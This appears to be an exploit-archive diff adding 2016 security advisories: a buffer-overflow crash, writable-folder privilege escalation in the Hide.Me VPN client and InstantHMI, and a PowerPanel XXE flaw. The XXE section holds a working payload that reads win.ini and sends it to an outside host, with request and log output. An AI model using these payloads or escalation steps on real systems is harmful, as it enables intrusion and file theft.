st2 -1.00000000000000e+000
|
||||
st3 9.60000000000000e+001
|
||||
st4 1.08506945252884e-004
|
||||
st5 -1.00000000000000e+000
|
||||
st6 0.00000000000000e+000
|
||||
st7 0.00000000000000e+000
|
||||
mm0 0:2:2:2
|
||||
mm1 0:0:2:202
|
||||
mm2 0:1:1:1
|
||||
mm3 c000:0:0:0
|
||||
mm4 e38e:3900:0:0
|
||||
mm5 0:0:0:0
|
||||
mm6 0:0:0:0
|
||||
mm7 0:0:0:0
|
||||
mxcsr 1fa0
|
||||
xmm0 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
|
||||
xmm1 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
|
||||
xmm2 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
|
||||
xmm3 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
|
||||
xmm4 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
|
||||
xmm5 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
|
||||
xmm6 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
|
||||
xmm7 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
|
||||
iopl 0
|
||||
of 0
|
||||
df 0
|
||||
if 1
|
||||
tf 0
|
||||
sf 0
|
||||
zf 0
|
||||
af 0
|
||||
pf 1
|
||||
cf 0
|
||||
vip 0
|
||||
vif 0
|
||||
xmm0l 4141:4141:4141:4141
|
||||
xmm1l 4141:4141:4141:4141
|
||||
xmm2l 4141:4141:4141:4141
|
||||
xmm3l 4141:4141:4141:4141
|
||||
xmm4l 4141:4141:4141:4141
|
||||
xmm5l 4141:4141:4141:4141
|
||||
xmm6l 4141:4141:4141:4141
|
||||
xmm7l 4141:4141:4141:4141
|
||||
xmm0h 4141:4141:4141:4141
|
||||
xmm1h 4141:4141:4141:4141
|
||||
xmm2h 4141:4141:4141:4141
|
||||
xmm3h 4141:4141:4141:4141
|
||||
xmm4h 4141:4141:4141:4141
|
||||
xmm5h 4141:4141:4141:4141
|
||||
xmm6h 4141:4141:4141:4141
|
||||
xmm7h 4141:4141:4141:4141
|
||||
xmm0/0 41414141
|
||||
xmm0/1 41414141
|
||||
xmm0/2 41414141
|
||||
xmm0/3 41414141
|
||||
xmm1/0 41414141
|
||||
xmm1/1 41414141
|
||||
xmm1/2 41414141
|
||||
xmm1/3 41414141
|
||||
xmm2/0 41414141
|
||||
xmm2/1 41414141
|
||||
xmm2/2 41414141
|
||||
xmm2/3 41414141
|
||||
xmm3/0 41414141
|
||||
xmm3/1 41414141
|
||||
xmm3/2 41414141
|
||||
xmm3/3 41414141
|
||||
xmm4/0 41414141
|
||||
xmm4/1 41414141
|
||||
xmm4/2 41414141
|
||||
xmm4/3 41414141
|
||||
xmm5/0 41414141
|
||||
xmm5/1 41414141
|
||||
xmm5/2 41414141
|
||||
xmm5/3 41414141
|
||||
xmm6/0 41414141
|
||||
xmm6/1 41414141
|
||||
xmm6/2 41414141
|
||||
xmm6/3 41414141
|
||||
xmm7/0 41414141
|
||||
xmm7/1 41414141
|
||||
xmm7/2 41414141
|
||||
xmm7/3 41414141
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
|
||||
1) create .lgv file with bunch of 'A's length of 4096 overwrites XXM
|
||||
registers, ECX etc
|
||||
2) run from command line pipe the file to it to watch it crash and burn.
|
||||
|
||||
///////////////////////////////////////////////////////////////////////
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
===============================
|
||||
Vendor Notification: June 23, 2016
|
||||
Vendor acknowledged: July 1, 2016
|
||||
Vendor reply: Will not fix (stability issue)
|
||||
July 8, 2016 : Public Disclosure
|
||||
|
||||
|
||||
Severity Level:
|
||||
================
|
||||
Low
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the
|
||||
information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author
|
||||
prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
HYP3RLINX
|
72
platforms/windows/local/40071.txt
Executable file
72
platforms/windows/local/40071.txt
Executable file
|
@ -0,0 +1,72 @@
|
|||
Title: Hide.Me VPN Client - EoP: User to SYSTEM
|
||||
CWE Class: CWE-276: Incorrect Default Permissions
|
||||
Date: 01/06/2016
|
||||
Vendor: eVenture
|
||||
Product: Hide.Me VPN Client
|
||||
Version: 1.2.4
|
||||
Download link: https://hide.me/en/software/windows
|
||||
Tested on: Windows 7 x86, fully patched
|
||||
Release mode: no bugbounty program, public release
|
||||
|
||||
Installer Name: Hide.me-Setup-1.2.4.exe
|
||||
MD5: e5e5e2fa2c9592660a180357c4482740
|
||||
SHA1: 4729c45d6399c759cd8f6a0c5773e08c6c57e034
|
||||
|
||||
- 1. Introduction: -
|
||||
The installer automatically creates a folder named "hide.me VPN" under
|
||||
c:\program files\ for the software.
|
||||
No other location can be specified during installation.
|
||||
|
||||
The folder has insecure permissions allowing EVERYONE the WRITE permission.
|
||||
Users can replace binaries or plant malicious DLLs to obtain elevated privileges.
|
||||
|
||||
As the software is running one executable as service under SYSTEM
|
||||
permissions an attacker could elevate from regular user to SYSTEM.
|
||||
|
||||
- 2. Technical Details/PoC: -
|
||||
A. Obtain and execute the installer.
|
||||
B. Observe there is no prompt to specify an installation location.
|
||||
C. Review permissions under the Explorer Security tab or run icacls.exe
|
||||
|
||||
Example:
|
||||
|
||||
C:\Program Files\hide.me VPN Everyone:(OI)(CI)(M)
|
||||
NT SERVICE\TrustedInstaller:(I)(F)
|
||||
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
|
||||
BUILTIN\Administrators:(I)(F)
|
||||
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
|
||||
BUILTIN\Users:(I)(RX)
|
||||
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
|
||||
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
|
||||
|
||||
Successfully processed 1 files; Failed processing 0 files
|
||||
|
||||
C. A user can overwrite an executable or drop a malicious DLL to obtain code execution.
|
||||
The highest permissions are reached by overwriting the service executable: vpnsvc.exe
|
||||
|
||||
However it is running at startup and can't be stopped by a non-privileged user.
|
||||
|
||||
As we can write to the directory we can rename all of the DLL's to DLL.old
|
||||
|
||||
C:\Program Files\hide.me VPN\Common.dll
|
||||
C:\Program Files\hide.me VPN\SharpRaven.dll
|
||||
C:\Program Files\hide.me VPN\ComLib.dll
|
||||
C:\Program Files\hide.me VPN\vpnlib.dll
|
||||
C:\Program Files\hide.me VPN\Newtonsoft.Json.dll
|
||||
C:\Program Files\hide.me VPN\DotRas.dll
|
||||
|
||||
Once renamed, reboot the machine, log on as normal user.
|
||||
|
||||
E. Observe both application AND the system service have crashed.
|
||||
Now replace vpnsvc.exe with a malicious copy.
|
||||
Place back all original DLLS and reboot.
|
||||
|
||||
Our code will get executed under elevated permissions: SYSTEM.
|
||||
|
||||
- 3. Mitigation: -
|
||||
A. set appropriate permissions on the application folder.
|
||||
|
||||
- 4. Author: -
|
||||
sh4d0wman
|
56
platforms/windows/local/40072.txt
Executable file
56
platforms/windows/local/40072.txt
Executable file
|
@ -0,0 +1,56 @@
|
|||
Title: InstantHMI - EoP: User to ADMIN
|
||||
CWE Class: CWE-276: Incorrect Default Permissions
|
||||
Date: 01/06/2016
|
||||
Vendor: Software Horizons
|
||||
Product: InstantHMI
|
||||
Version: 6.1
|
||||
Download link: http://www.instanthmi.com/ihmisoftware.htm
|
||||
Tested on: Windows 7 x86, fully patched
|
||||
Release mode: no bugbounty program, public release
|
||||
|
||||
Installer Name: IHMI61-PCInstall-Unicode.exe
|
||||
MD5: ee3ca3181c51387d89de19e89aea0b31
|
||||
SHA1: c3f1929093a3bc28f4f8fdd9cb38b1455d7f0d6f
|
||||
|
||||
- 1. Introduction: -
|
||||
During a standard installation (default option) the installer
|
||||
automatically creates a folder named "IHMI-6" in the root drive.
|
||||
No other location can be specified during standard installation.
|
||||
|
||||
As this folder receives default permissions AUTHENTICATED USERS
|
||||
are given the WRITE permission.
|
||||
|
||||
Because of this they can replace binaries or plant malicious
|
||||
DLLs to obtain elevated, administrative level, privileges.
|
||||
|
||||
- 2. Technical Details/PoC: -
|
||||
A. Obtain and execute the installer.
|
||||
|
||||
B. Observe there is no prompt for the installation location.
|
||||
|
||||
C. Review permissions under the Explorer Security tab or run icacls.exe
|
||||
|
||||
Example:
|
||||
|
||||
IHMI-6 BUILTIN\Administrators:(I)(F)
|
||||
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
|
||||
BUILTIN\Users:(I)(OI)(CI)(RX)
|
||||
NT AUTHORITY\Authenticated Users:(I)(M)
|
||||
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
|
||||
|
||||
Successfully processed 1 files; Failed processing 0 files
|
||||
|
||||
D. Change the main executable: InstantHMI.exe with a malicious copy.
|
||||
|
||||
E. Once executed by an administrator our code will run
|
||||
under administrator level privileges.
|
||||
|
||||
- 3. Mitigation: -
|
||||
A. Install under "c:\program files" or "C:\Program Files (x86)"
|
||||
|
||||
B. set appropriate permissions on the application folder.
|
||||
|
||||
- 4. Author: -
|
||||
sh4d0wman
|
135
platforms/xml/webapps/40077.txt
Executable file
135
platforms/xml/webapps/40077.txt
Executable file
|
@ -0,0 +1,135 @@
|
|||
CyberPower Systems PowerPanel 3.1.2 XXE Out-Of-Band Data Retrieval
|
||||
|
||||
|
||||
Vendor: CyberPower Systems, Inc.
|
||||
Product web page: https://www.cyberpowersystems.com
|
||||
Affected version: 3.1.2 (37567) Business Edition
|
||||
|
||||
Summary: The PowerPanel® Business Edition software from
|
||||
CyberPower provides IT professionals with the tools they
|
||||
need to easily monitor and manage their backup power.
|
||||
Available for compatible CyberPower UPS models, this
|
||||
software supports up to 250 clients, allowing users remote
|
||||
access (from any network PC with a web browser) to instantly
|
||||
access vital UPS battery conditions, load levels, and runtime
|
||||
information. Functionality includes application/OS shutdown,
|
||||
event logging, hibernation mode, internal reports and analysis,
|
||||
remote management, and more.
|
||||
|
||||
Desc: PowerPanel suffers from an unauthenticated XML External
|
||||
Entity (XXE) vulnerability using the DTD parameter entities
|
||||
technique resulting in disclosure and retrieval of arbitrary
|
||||
data on the affected node via out-of-band (OOB) attack. The
|
||||
vulnerability is triggered when input passed to the xmlservice
|
||||
servlet using the ppbe.xml script is not sanitized while parsing the
|
||||
xml inquiry payload returned by the JAXB element translation.
|
||||
|
||||
================================================================
|
||||
|
||||
C:\Program Files (x86)\CyberPower PowerPanel Business Edition\
|
||||
\web\work\ROOT\webapp\WEB-INF\classes\com\cyberpowersystems\ppbe\webui\xmlservice\
|
||||
------------------------
|
||||
XmlServiceServlet.class:
|
||||
------------------------
|
||||
|
||||
94: private InquirePayload splitInquirePayload(InputStream paramInputStream)
|
||||
95: throws RequestException
|
||||
96: {
|
||||
97: try
|
||||
98: {
|
||||
99: JAXBContext localJAXBContext = JAXBContext.newInstance("com.cyberpowersystems.ppbe.core.xml.inquiry");
|
||||
100: Unmarshaller localUnmarshaller = localJAXBContext.createUnmarshaller();
|
||||
101: JAXBElement localJAXBElement = (JAXBElement)localUnmarshaller.unmarshal(paramInputStream);
|
||||
102: return (InquirePayload)localJAXBElement.getValue();
|
||||
103: }
|
||||
104: catch (JAXBException localJAXBException)
|
||||
105: {
|
||||
106: localJAXBException.printStackTrace();
|
||||
107: throw new RequestException(Error.INQUIRE_PAYLOAD_CREATE_FAIL, "Translate input to JAXB object failed.");
|
||||
108: }
|
||||
109: }
|
||||
|
||||
---
|
||||
|
||||
C:\Program Files (x86)\CyberPower PowerPanel Business Edition\web\work\ROOT\webapp\WEB-INF\
|
||||
--------
|
||||
web.xml:
|
||||
--------
|
||||
|
||||
28: <servlet>
|
||||
29: <servlet-name>xmlService</servlet-name>
|
||||
30: <servlet-class>com.cyberpowersystems.ppbe.webui.xmlservice.XmlServiceServlet</servlet-class>
|
||||
31: <load-on-startup>3</load-on-startup>
|
||||
32: </servlet>
|
||||
..
|
||||
..
|
||||
60: <servlet-mapping>
|
||||
61: <servlet-name>xmlService</servlet-name>
|
||||
62: <url-pattern>/ppbe.xml</url-pattern>
|
||||
63: </servlet-mapping>
|
||||
|
||||
================================================================
|
||||
|
||||
|
||||
Tested on: Microsoft Windows 7 Ultimate SP1 EN
|
||||
Microsoft Windows 8
|
||||
Microsoft Windows Server 2012
|
||||
Linux (64bit)
|
||||
MacOS X 10.6
|
||||
Jetty(7.5.0.v20110901)
|
||||
Java/1.8.0_91-b14
|
||||
SimpleHTTP/0.6 Python/2.7.1
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2016-5338
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5338.php
|
||||
|
||||
|
||||
22.06.2016
|
||||
|
||||
--
|
||||
|
||||
|
||||
C:\data\xxe.xml:
|
||||
----------------
|
||||
|
||||
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
|
||||
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://192.168.1.16:8011/?%payload;'> ">
|
||||
|
||||
|
||||
Request:
|
||||
--------
|
||||
|
||||
POST /client/ppbe.xml HTTP/1.1
|
||||
Host: localhost:3052
|
||||
Content-Length: 258
|
||||
User-Agent: XXETester/1.0
|
||||
Connection: close
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8" ?>
|
||||
<!DOCTYPE zsl [
|
||||
<!ENTITY % remote SYSTEM "http://192.168.1.16:8011/xxe.xml">
|
||||
%remote;
|
||||
%root;
|
||||
%oob;]>
|
||||
<ppbe>
|
||||
<target>
|
||||
<command>action.notification.recipient.present</command>
|
||||
</target>
|
||||
<inquire />
|
||||
</ppbe>
|
||||
|
||||
|
||||
|
||||
Response:
|
||||
---------
|
||||
|
||||
C:\data>python -m SimpleHTTPServer 8011
|
||||
Serving HTTP on 0.0.0.0 port 8011 ...
|
||||
lab07.home - - [03/Jul/2016 13:09:04] "GET /xxe.xml HTTP/1.1" 200 -
|
||||
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A HTTP/1.1" 301 -
|
||||
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A/ HTTP/1.1" 200 -
|
Loading…
Add table
Reference in a new issue